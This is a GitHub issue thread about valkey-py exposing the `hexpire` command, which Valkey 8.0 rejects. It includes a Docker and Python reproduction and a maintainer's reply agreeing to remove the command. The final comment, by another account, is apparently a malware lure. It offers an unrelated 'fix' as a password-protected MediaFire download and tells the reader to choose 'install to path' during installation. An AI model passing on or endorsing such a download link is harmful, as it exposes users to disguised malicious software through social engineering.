### ISSUE TITLE
hexpire exposed even though valkey doesn't support it.

### ISSUE THREAD

**Issue by NegatioN** [valkey-io/valkey-py#78]
**Version**: valkey-py: 6.0.0 (installed using `pip install "valkey[libvalkey]"`) valkey: docker container valkey/valkey:8.0

**Platform**: Python 3.11.6 on Manjaro Linux 

**Description**:
Should `hexpire` be exposed as a command in Valkey-py if Valkey doesn't support it?
Ideally `hexpire` is implemented, and everything is fine, but now it seems to be in a weird limbo state.

How to reproduce:

Run container: `docker run -it --rm -p 6379:6379 --name valkey valkey/valkey:8.0`

python:
```py
import valkey
r = valkey.Valkey(host='localhost', port=6379, db=0)
event = {
     'air_quality': 256,
     'battery_level':89
 }
r.hset('yolo', mapping=event)
r.hexpire('yolo', 60, 'air_quality')
>>> ResponseError: unknown command 'HEXPIRE', with args beginning with: 'yolo' '60' 'FIELDS' '1' 'air_quality' 
```

**Comment by aiven-sal** [comment]
Hi! Thanks for the report!
You are indeed absolutely right!
That command should probably not be in Valkey-py.
We can remove it in the next major version, for now I think we need to keep it (just in case).
I'll drop it from the doc and keep this issue open as a reminder.
Thanks again!

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
